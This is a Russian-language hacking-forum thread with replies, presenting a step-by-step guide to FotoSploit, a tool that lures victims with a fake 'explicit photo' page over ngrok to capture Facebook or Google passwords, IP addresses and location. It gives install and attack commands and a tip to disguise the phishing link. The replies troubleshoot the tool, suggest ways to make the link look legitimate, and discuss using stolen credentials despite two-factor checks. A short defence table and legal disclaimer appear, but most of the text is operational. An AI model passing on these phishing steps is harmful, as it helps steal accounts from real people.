• 🔥 Бесплатный курс от Академии Кодебай: «Анализ защищенности веб-приложений»

    🛡 Научитесь находить и использовать уязвимости веб-приложений.
    🧠 Изучите SQLi, XSS, CSRF, IDOR и другие типовые атаки на практике.
    🧪 Погрузитесь в реальные лаборатории и взломайте свой первый сайт!
    🚀 Подходит новичкам — никаких сложных предварительных знаний не требуется.

    Доступ открыт прямо сейчас Записаться бесплатно

Атака через FotoSploit: пошаговое руководство по фишингу с превью-фото

Vertigo

Lex mea est Vulgate Linux
Gold Team
15.02.2017
1 321
3 932
fotosploit.png


Приветствую, Друзья и Форумчане!

Сегодня разберём FotoSploit — свежий (2025) инструмент от испанца Cesar-Hack-Gray для проведения фишинговых атак + социальной инженерии против аккаунтов Facebook / Google.
⚠️ Информация предоставлена исключительно для обучения и анализа уязвимостей. Любое несанкционированное применение подпадает под ст. 272 УК РФ / Computer Misuse Act / GDPR.

Что под капотом

  • Ядро: старый добрый SocialFish с доработками под php и автоматическим туннелированием через ngrok.
  • Лут: IP-адрес жертвы, HTTP headers (User-Agent), примерные Geo-координаты по GeoIP, плюс логин/пароль, если пользователь введёт их на поддельной форме.
  • Фишка: «кликабельное откровенное фото» (JPG ≤ 500 KB) с заманчивым описанием и редиректом на реальный YouTube/Facebook, чтобы не вызвать подозрений.

Быстрая установка

Arch Linux / Manjaro
Код:
# git clone https://github.com/Cesar-Hack-Gray/FotoSploit.git
# mv FotoSploit /root/
# cd /root/FotoSploit
# chmod +x install.sh FotoSploit
# bash install.sh
# ./FotoSploit
Скрипт жёстко проверяет наличие директории /root/FotoSploit; иначе вылетает с ошибкой «Directory not found».
Termux (Android)
Код:
pkg update && pkg upgrade -y
pkg install -y php python2 git
cd $HOME
git clone https://github.com/Cesar-Hack-Gray/FotoSploit
cd FotoSploit
bash install.sh
./FotoSploit

Подготовка поля боя

  1. ngrok
    • Если бинари не встали автоматически — качаем под свою архитектуру и кидаем в каталог инструмента (FotoSploit/ngrok).
  2. Приманка-фото
    • Любой JPG ≤ 500 KB (разрешение не критично, но 430 × 430 px — оптимум).
    • Кладём в /root/ или $HOME/FotoSploit (см. foto параметр).
  3. Тест-аккаунт
    • Используем песочницу, чтобы не «стрельнуть» по продакшен-учётке.

Стартуем атаку

Код:
> show options
> set foto /root/pic.jpg
> set title "Моё откровенное фото здесь"
> set view YOUTUBE     # либо FACEBOOK
> show options         # проверяем
> go
fotosploit2.png

  • Дожидаемся, пока скрипт прогрузит картинку без ошибок.
  • Получаем ссылку вида https://hbhg2fg1.ngrok.io/id=1.php.
  • Лайфхак: обфусцируйте URL (bit.ly, рекламный редирект, Base64 и т.д.), чтобы он выглядел правдоподобно.
Когда жертва переходит по ссылке, видит заставку 18+ и форму логина. Пока «тело думает», на вашей консоли уже лежат IP, User-Agent и гео-данные:

fotosploit4.png


Если жертва всё же авторизуется — логин+пароль записываются в sites/credentials.txt, а она попадает на реальный YouTube-канал:

fotosploit5.png

Как это детектировать и отбиться

Техника защитыСуть
2FA / FIDO2Даже при краже пароля злоумышленник не пройдёт второй фактор.
Проверка URLОфициальные Facebook/Google-адреса всегда .com/ без ngrok, bit.ly и лишних параметров.
Браузер-алертыChrome/Edge помечают HTTP-формы «Небезопасно».
Блокировка ngrokWAF или адресные ACL на *.ngrok.io.
Тренинги по фишингуРаз в квартал прогоняйте сотрудников через simulated-phish-кампании.

Юридический момент

  • РФ: несанкционированный доступ (ст. 272 УК), до 6 лет лишения свободы.
  • ЕС: директива 2013/40/EU + GDPR (штрафы до 20 млн € или 4 % оборота).
  • Pen-test ≠ взлом: нужен письменный договор и чёткое согласие владельца системы.

Итоги

  • FotoSploit — удобный конструктор фейковых страниц, но ничего принципиально нового: SocialFish + ngrok + JPG-приманка.
  • Полезен только в рамках легального Red Team/Phishing-Simulation с согласием заказчика.
  • Защититься помогают базовые меры — 2FA, фильтрация туннелей и здравый смысл пользователя.
Будьте этичными. Знание атаки — первый шаг к обороне.
До новых встреч, всем удачи и безопасных дорог в сети!
 
Последнее редактирование:
Не прикрепляет фото и ngrok выдает ссылку на localhost. Тестил на kali и parrot. Или лыжи не едут, или что-то с руками :(
 
  • Нравится
Реакции: LTD и student888
Идея зачетная, но зачем все так усложнять? Не легче ли самим прописать несколько строчек open graph на фишере?
 
Теперь смотрите,здесь ещё один секрет для Linux:
чтобы она отработала как положено,её приводим к виду https://hbhg2fg1.ngrok.io/id=1.php
Можно сделать ещё красивее:
Сайт
На нём есть сервис, который сокращает ссылки
Самое интересное, что можно в конце ссылки указать "расширение",
chrome_tIL1fpjhAn.png
приведя ссылку, например, к виду
 
  • Нравится
Реакции: Vertigo, potemking и LTD
Привет! При попытке установить фото:
Screenshot_1.png
 
Не прикрепляет фото и ngrok выдает ссылку на localhost. Тестил на kali и parrot.
На Kali nethunter по идее должен работать,на стандартной Kali может не пойти.
Parrot обновлённый тоже может не потянуть из-за версий установочных пакетов.
Привет! При попытке установить фото:
скрипт ngrok попробуйте скопировать в директорию bin
 
  • Нравится
Реакции: Rapira и LTD
а зачем логин и пароль от гугла или фб, если при их вводе в гугле 99% запросит проверку а на фб 90%? нужна же куки сессия. или я чего-то не знаю?
 
а зачем логин и пароль от гугла или фб, если при их вводе в гугле 99% запросит проверку а на фб 90%? нужна же куки сессия. или я чего-то не знаю?
А что мешает скрипту эту сессию поднять, авторизовавшись с указанными данными?
Та проверка, о которой ты говоришь, появится уже после введения "жертвой" логина и пароля.
Так что даже, если она откажется от подтверждения, данные к тому времени уже утекут.

Если ты имеешь в виду дальнейшую авторизацию, то ничто не мешает найти нужные прокси в нужной стране,
или авторизоваться через какие-то другие сервисы.
 
  • Нравится
Реакции: Vertigo и LTD
А что мешает скрипту эту сессию поднять, авторизовавшись с указанными данными?
Та проверка, о которой ты говоришь, появится уже после введения "жертвой" логина и пароля.
Так что даже, если она откажется от подтверждения, данные к тому времени уже утекут.

Если ты имеешь в виду дальнейшую авторизацию, то ничто не мешает найти нужные прокси в нужной стране,
или авторизоваться через какие-то другие сервисы.
Я имею ввиду дальнейшую авторизацию. Но прокси нормальные еще поискать надо. А что за другие сервисы для авторизации для гугла например?
 
Я имею ввиду дальнейшую авторизацию. Но прокси нормальные еще поискать надо. А что за другие сервисы для авторизации для гугла например?
Ты же видишь сколько сейчас сервисов у гугла: и youtube, и календарь, и таблицы, и много чего ещё.
Вполне возможно, что сейчас или потом при входе в один из них получится авторизоваться без дополнительной проверки.
Другой вариант - это возможность использования тех же учетных данных для совсем иного сервиса, где не требуется проверка вообще.
 
Ты же видишь сколько сейчас сервисов у гугла: и youtube, и календарь, и таблицы, и много чего ещё.
Вполне возможно, что сейчас или потом при входе в один из них получится авторизоваться без дополнительной проверки.
Другой вариант - это возможность использования тех же учетных данных для совсем иного сервиса, где не требуется проверка вообще.
авторизация на сервисах идет через одну и ту же форму.
А пароль сейчас вообще будет сложно получить, с последним обновлением хрома они вроде как хешируют поле пароля, и на прозрачном прокси виден только хэш. Такая вот защита от фишинга
 
ТС, окажи милость, дай подсказку)
Да если бы я знал решение проблем,поэтому и молчу сижу.)
Капризный инструмент.На BlackArch заводится легко,но бывает ,что придирается к файлам-картинкам,или не прогружает их с первого раза.
Пробуйте его переустановить сразу в директорию root ,ngrok он сам должен установить в свою директорию.
Автор 3 дня назад вносил изменения,пофиксил некоторые ошибки,но просто сам скрипт всё-таки создан для termux.
 
авторизация на сервисах идет через одну и ту же форму.
Речь не о форме. Ты можешь подключаться к сервисам не только через браузер, но и через телефон, телевизор и черт знает что ещё.
А какая реализация этого подключения есть и будет там неизвестно.
В любом случае это один из векторов атаки, использовать тебе его или нет, решай сам.

последним обновлением хрома они вроде как хешируют поле пароля, и на прозрачном прокси виден только хэш.
А как сайт, к которому обращается браузер, поймёт что это хеш, а не пароль?
На большинстве сайтов идёт авторизация по паролю, а не по хешу...
И не обязательно пользователь использует chrome, есть и другие браузеры.
 
Речь не о форме. Ты можешь подключаться к сервисам не только через браузер, но и через телефон, телевизор и черт знает что ещё.
А какая реализация этого подключения есть и будет там неизвестно.
В любом случае это один из векторов атаки, использовать тебе его или нет, решай сам.


А как сайт, к которому обращается браузер, поймёт что это хеш, а не пароль?
На большинстве сайтов идёт авторизация по паролю, а не по хешу...
И не обязательно пользователь использует chrome, есть и другие браузеры.
наверное речь идет о самых популярных(гугл, фб, ... По аналогии с HSTS, где они уже вшиты в браузер) ну хром самый популярный, по моей статистике. Возможно остальные потом присоединятся
 
Да ребят это лучший способ фишинга который я встречал, только плохо что по ip правильно только страну показывает а так все идеально
Совет: чтобы фотка прогружалась нужно обрезать ее в галерее до размера ниже 430x430, ещё когда я впервые запускал скрипт у меня была ошибка типа "invaldo red social " я не знал что делать
Нужно ввести set red social --help
 
  • Нравится
Реакции: Vertigo
Мы в соцсетях:

Взломай свой первый сервер и прокачай скилл — Начни игру на HackerLab